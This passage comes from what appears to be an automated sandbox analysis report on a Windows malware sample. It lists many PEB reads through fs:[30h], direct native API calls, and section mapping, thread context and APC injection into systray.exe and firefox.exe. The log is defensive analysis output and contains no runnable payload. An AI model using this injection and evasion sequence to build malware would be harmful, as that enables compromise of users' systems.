              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114A4B0 mov eax, dword ptr fs:[00000030h]0_2_0114A4B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C64AB mov eax, dword ptr fs:[00000030h]0_2_010C64AB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F44B0 mov ecx, dword ptr fs:[00000030h]0_2_010F44B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C04E5 mov ecx, dword ptr fs:[00000030h]0_2_010C04E5
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC700 mov eax, dword ptr fs:[00000030h]0_2_010FC700
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0710 mov eax, dword ptr fs:[00000030h]0_2_010C0710
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F0710 mov eax, dword ptr fs:[00000030h]0_2_010F0710
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113C730 mov eax, dword ptr fs:[00000030h]0_2_0113C730
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC720 mov eax, dword ptr fs:[00000030h]0_2_010FC720
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC720 mov eax, dword ptr fs:[00000030h]0_2_010FC720
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F273C mov eax, dword ptr fs:[00000030h]0_2_010F273C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F273C mov ecx, dword ptr fs:[00000030h]0_2_010F273C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F273C mov eax, dword ptr fs:[00000030h]0_2_010F273C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102750 mov eax, dword ptr fs:[00000030h]0_2_01102750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102750 mov eax, dword ptr fs:[00000030h]0_2_01102750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01144755 mov eax, dword ptr fs:[00000030h]0_2_01144755
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F674D mov esi, dword ptr fs:[00000030h]0_2_010F674D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F674D mov eax, dword ptr fs:[00000030h]0_2_010F674D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F674D mov eax, dword ptr fs:[00000030h]0_2_010F674D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E75D mov eax, dword ptr fs:[00000030h]0_2_0114E75D
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C0750 mov eax, dword ptr fs:[00000030h]0_2_010C0750
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C8770 mov eax, dword ptr fs:[00000030h]0_2_010C8770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D0770 mov eax, dword ptr fs:[00000030h]0_2_010D0770
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116678E mov eax, dword ptr fs:[00000030h]0_2_0116678E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C07AF mov eax, dword ptr fs:[00000030h]0_2_010C07AF
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011747A0 mov eax, dword ptr fs:[00000030h]0_2_011747A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CC7C0 mov eax, dword ptr fs:[00000030h]0_2_010CC7C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011407C3 mov eax, dword ptr fs:[00000030h]0_2_011407C3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E27ED mov eax, dword ptr fs:[00000030h]0_2_010E27ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E27ED mov eax, dword ptr fs:[00000030h]0_2_010E27ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E27ED mov eax, dword ptr fs:[00000030h]0_2_010E27ED
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E7E1 mov eax, dword ptr fs:[00000030h]0_2_0114E7E1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C47FB mov eax, dword ptr fs:[00000030h]0_2_010C47FB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C47FB mov eax, dword ptr fs:[00000030h]0_2_010C47FB
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D260B mov eax, dword ptr fs:[00000030h]0_2_010D260B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01102619 mov eax, dword ptr fs:[00000030h]0_2_01102619
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E609 mov eax, dword ptr fs:[00000030h]0_2_0113E609
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C262C mov eax, dword ptr fs:[00000030h]0_2_010C262C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DE627 mov eax, dword ptr fs:[00000030h]0_2_010DE627
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F6620 mov eax, dword ptr fs:[00000030h]0_2_010F6620
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F8620 mov eax, dword ptr fs:[00000030h]0_2_010F8620
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010DC640 mov eax, dword ptr fs:[00000030h]0_2_010DC640
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA660 mov eax, dword ptr fs:[00000030h]0_2_010FA660
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA660 mov eax, dword ptr fs:[00000030h]0_2_010FA660
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118866E mov eax, dword ptr fs:[00000030h]0_2_0118866E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118866E mov eax, dword ptr fs:[00000030h]0_2_0118866E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F2674 mov eax, dword ptr fs:[00000030h]0_2_010F2674
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4690 mov eax, dword ptr fs:[00000030h]0_2_010C4690
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C4690 mov eax, dword ptr fs:[00000030h]0_2_010C4690
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FC6A6 mov eax, dword ptr fs:[00000030h]0_2_010FC6A6
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F66B0 mov eax, dword ptr fs:[00000030h]0_2_010F66B0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]0_2_010FA6C7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010FA6C7 mov eax, dword ptr fs:[00000030h]0_2_010FA6C7
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E6F2 mov eax, dword ptr fs:[00000030h]0_2_0113E6F2
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011406F1 mov eax, dword ptr fs:[00000030h]0_2_011406F1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011406F1 mov eax, dword ptr fs:[00000030h]0_2_011406F1
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C912 mov eax, dword ptr fs:[00000030h]0_2_0114C912
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8918 mov eax, dword ptr fs:[00000030h]0_2_010B8918
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010B8918 mov eax, dword ptr fs:[00000030h]0_2_010B8918
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E908 mov eax, dword ptr fs:[00000030h]0_2_0113E908
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0113E908 mov eax, dword ptr fs:[00000030h]0_2_0113E908
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114892A mov eax, dword ptr fs:[00000030h]0_2_0114892A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0115892B mov eax, dword ptr fs:[00000030h]0_2_0115892B
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01140946 mov eax, dword ptr fs:[00000030h]0_2_01140946
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01194940 mov eax, dword ptr fs:[00000030h]0_2_01194940
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C97C mov eax, dword ptr fs:[00000030h]0_2_0114C97C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E6962 mov eax, dword ptr fs:[00000030h]0_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E6962 mov eax, dword ptr fs:[00000030h]0_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E6962 mov eax, dword ptr fs:[00000030h]0_2_010E6962
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01164978 mov eax, dword ptr fs:[00000030h]0_2_01164978
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_01164978 mov eax, dword ptr fs:[00000030h]0_2_01164978
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E mov eax, dword ptr fs:[00000030h]0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E mov edx, dword ptr fs:[00000030h]0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0110096E mov eax, dword ptr fs:[00000030h]0_2_0110096E
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C09AD mov eax, dword ptr fs:[00000030h]0_2_010C09AD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010C09AD mov eax, dword ptr fs:[00000030h]0_2_010C09AD
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011489B3 mov esi, dword ptr fs:[00000030h]0_2_011489B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011489B3 mov eax, dword ptr fs:[00000030h]0_2_011489B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011489B3 mov eax, dword ptr fs:[00000030h]0_2_011489B3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010D29A0 mov eax, dword ptr fs:[00000030h]0_2_010D29A0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0118A9D3 mov eax, dword ptr fs:[00000030h]0_2_0118A9D3
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_011569C0 mov eax, dword ptr fs:[00000030h]0_2_011569C0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010CA9D0 mov eax, dword ptr fs:[00000030h]0_2_010CA9D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F49D0 mov eax, dword ptr fs:[00000030h]0_2_010F49D0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114E9E0 mov eax, dword ptr fs:[00000030h]0_2_0114E9E0
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F29F9 mov eax, dword ptr fs:[00000030h]0_2_010F29F9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010F29F9 mov eax, dword ptr fs:[00000030h]0_2_010F29F9
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0114C810 mov eax, dword ptr fs:[00000030h]0_2_0114C810
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116483A mov eax, dword ptr fs:[00000030h]0_2_0116483A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_0116483A mov eax, dword ptr fs:[00000030h]0_2_0116483A
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov eax, dword ptr fs:[00000030h]0_2_010E2835
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exeCode function: 0_2_010E2835 mov ecx, dword ptr fs:[00000030h]0_2_010E2835

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtOpenSection: Direct from: 0x76EF2E0C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtCreateFile: Direct from: 0x76EF2FEC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtOpenFile: Direct from: 0x76EF2DCC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtTerminateThread: Direct from: 0x76EF2FCC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtCreateMutant: Direct from: 0x76EF35CC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtResumeThread: Direct from: 0x76EF36AC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtReadFile: Direct from: 0x76EF2ADC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtDelayExecution: Direct from: 0x76EF2DDC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtResumeThread: Direct from: 0x76EF2FBC
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtCreateUserProcess: Direct from: 0x76EF371C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtSetInformationThread: Direct from: 0x76EE63F9
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtClose: Direct from: 0x76EF2B6C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtSetInformationThread: Direct from: 0x76EF2B4C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
              Source: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe NtCreateKey: Direct from: 0x76EF2C6C
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Section loaded: NULL target: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe protection: execute and read and write
              Source: C:\Users\user\Desktop\JJ0tnjLiDS.exe Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe protection: read write
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
              Source: C:\Windows\SysWOW64\systray.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
              Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 2300
              Source: C:\Windows\SysWOW64\systray.exe Thread APC queued: target process: C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\x6fGRpae78G.exe
